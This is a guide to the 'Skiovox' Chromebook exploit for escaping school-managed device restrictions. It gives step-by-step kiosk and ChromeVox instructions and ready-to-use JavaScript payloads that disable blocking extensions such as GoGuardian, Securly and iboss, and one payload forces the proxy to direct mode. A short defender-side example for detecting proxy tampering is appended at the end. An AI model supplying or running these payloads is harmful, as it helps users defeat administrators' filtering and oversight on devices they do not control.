Skiovox
I (Amukerd) Will Keep This Updated As It Is An Amazing Exploit
This is a really neat exploit; maybe the best enrolled exploit ever found. It allows you to open an unblocked browser on any device on any recent version, and it's a big pain for admins to block. The core part of the exploit was found by @akabutnice and @bypassi expanded it.
Testing and advice was given by another group of awesome people.
Feel free to clone the slides and github release and host them yourself. Happy browsing!
Skiovox Breakout
(Get permanent code execution in school blocking extensions using Skiovox)
Do the main pdf guide first before going onto this, so you know more about what you are doing.
This extension helps you get permanent code execution in mv2/mv3 extensions in your school profile. That means you can execute code in these extensions, even when logged in normally, without skiovox.
Initial PoC was made by @unretained. @akabutnice improved it, tested it and fixed issues with it. While this looks barebones, we will keep adding fixes and improvements to this project.
2A Or 2B/2C Identification
After you turn off your wifi and enter the kiosk app, you need to identify whether you are a 2a or 2b/2c user. To do this, just check if you have a back button in the top left corner of the no internet screen. If you are a 2a user, just do the normal steps from the guide; if you are a 2b/2c user, do the steps below.
Open Chromevox using the shortcut ctrl-alt-z
Wait a few seconds for Chromevox to load and do the shortcut search-O-T (search is the magnifying glass on your keyboard)
This will take you to a ChromeVox tutorial page. Click the last of the boxes, named 'Resources'.
From there, click the blue link titled 'ChromeVox Command Reference'
Now on the left side of the screen press 'Sign in as an additional user' - if you cannot do this, and you are not a 2a user, then you cannot do the extension breakout.
Sign in as you would, with your email and password. If your school uses other forms of login, like OneLogin, just forget it. All you need is your email and password.
From there, you might get a popup that reads like this: "An administrator has disallowed multiple sign-in for youremail@emaildomain.com. All users must sign out to continue". Just press Escape to bypass this.
Usage instructions
1. Extract this extension and the Skiovox one from above, and install them in chrome://extensions as unpacked extensions.
2. Open a new tab to the custom Skiovox one and click on the extension in the toolbar (you might have to click the puzzle piece icon to see it), and type in the first 5 letters of your blocker ext id. Remove the text alert(1); from the second box. Press Start injection. If it's done right, a popup just below the url bar will say "Skiovox Breakout has started debugging this browser".
3. Now, go to your school window, and go to chrome://extensions. Find the chrome extension you want to disable on the list, and click on the details button. If there is a switch on there, spam it. If there isn't, you can just open a page inside the extension, for example chrome-extension://Your Extension Id Here/_generated_background_page.html, and spam refresh.
4. After enough times, a popup should show up with the following alert:
*Extension Name*
Save this in your bookmarks: filesystem://chrome-extension://extensionid/temporary/shim.html
As it says, save this in your school bookmarks, then reboot and log in to your school account with your wifi on.
5. Right click the bookmark, and select Open in new tab, or copy the link, place it in the url bar, and press alt-shift-enter, then type in your payload.
There it is. You have an input box where you can upload any javascript for it to be evaluated. More javascript to come, but I recommend the universal payload if you want to simply disable any extension.
Common complaints
Q: I don't see a chromevox popup, what's happening?
A: That app doesn't support chromevox, use another app.
Q: How do I do anything when I don't have internet?
A: If you're speaking of steps 1 to 5, you don't need it.
Q: I don't see the 'sign into another account' button.
A: You either need to restart the chromebook, or just make sure to turn off internet BEFORE going into the kiosk app.
It also might be possible that this doesn't work on versions 118 or 119.
Payloads
Universal:
chrome.runtime.getBackgroundPage(function (p) {
    p.chrome.management.setEnabled("Your Specific Extension Id Here", false);
});
Replace 'Your Specific Extension Id Here' with the id of your blocking extension (keep the quotes around the id).
This is one-time use though, as you cannot turn the blocking extension back on if you use this specific payload.
Securly:
localStorage.cluster = "AVOID_OS, " + (Date.now() * (Math.random()))
Goguardian:
chrome.runtime.getBackgroundPage(function (page) {
    page.alert(page.chrome.tabs.captureVisibleTabAsync = function () {})
})
or
for (let i = 0; i < localStorage.length; i++) {
    localStorage[localStorage.key(i)] = "-"
}
chrome.extension.getBackgroundPage().location.reload()
Either one works.
Iboss:
var config = {
    mode: "direct"
};
var intervalId = setInterval(function () {
    chrome.proxy.settings.set(
        {value: config, scope: 'regular'},
        function(x) {}
    );
})
onload = function (ev) {
    var btnElement = document.createElement('button');
    btnElement.onclick = function (ev) {
        clearInterval(intervalId)
    }
    btnElement.innerHTML = 'hi';
    document.body.appendChild(btnElement);
}
(This sets the proxy mode to direct, so traffic stops going through the filtering proxy.)
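For the defender side of the iboss payload above, here is an added example (not code from the Skiovox guide or from any blocking extension) of how a proxy-based filtering extension can notice that its chrome.proxy.settings configuration was replaced with mode "direct" and decide whether re-applying it is even possible. The expected configuration, proxy host and sample objects are constructed for the demo; the object shapes follow chrome.proxy.settings.get() and its onChange event.

```javascript
// Added defender-side example; not part of the Skiovox guide.
// chrome.proxy.settings.get()/onChange report { value: ProxyConfig, levelOfControl }.
// The enforced config and proxy host below are constructed placeholders.

const EXPECTED = {
  mode: "fixed_servers",
  rules: { singleProxy: { scheme: "https", host: "proxy.example.test", port: 443 } },
};

// Compare what Chrome currently reports with what the extension enforces.
function auditProxySetting(observed, expected = EXPECTED) {
  const value = observed.value || {};
  const findings = [];
  if (value.mode !== expected.mode) {
    findings.push(`mode changed: expected ${expected.mode}, got ${value.mode}`);
  }
  const want = expected.rules && expected.rules.singleProxy;
  const got = value.rules && value.rules.singleProxy;
  if (want && (!got || got.host !== want.host || got.port !== want.port)) {
    findings.push("proxy server rule no longer matches the enforced server");
  }
  // levelOfControl (chrome.types.ChromeSetting) says whether a set() would stick:
  // if another extension outranks us, re-applying is pointless and only logging helps.
  const canReapply = observed.levelOfControl === "controlled_by_this_extension" ||
                     observed.levelOfControl === "controllable_by_this_extension";
  return { tampered: findings.length > 0, canReapply, findings };
}

// Background-script wiring; returns false when run outside Chrome (e.g. in Node).
function installProxyWatchdog(expected = EXPECTED) {
  if (typeof chrome === "undefined" || !chrome.proxy) return false;
  chrome.proxy.settings.onChange.addListener((details) => {
    const audit = auditProxySetting(details, expected);
    if (audit.tampered) {
      console.warn("proxy config tampered:", audit.findings);
      if (audit.canReapply) {
        chrome.proxy.settings.set({ value: expected, scope: "regular" }, () => {});
      }
    }
  });
  return true;
}

// Constructed samples: untouched config, the "direct" config the payload sets,
// and the same change made by an extension that outranks ours.
const SAMPLE_OK = { value: EXPECTED, levelOfControl: "controlled_by_this_extension" };
const SAMPLE_DIRECT = { value: { mode: "direct" }, levelOfControl: "controlled_by_this_extension" };
const SAMPLE_OUTRANKED = { value: { mode: "direct" }, levelOfControl: "controlled_by_other_extensions" };
```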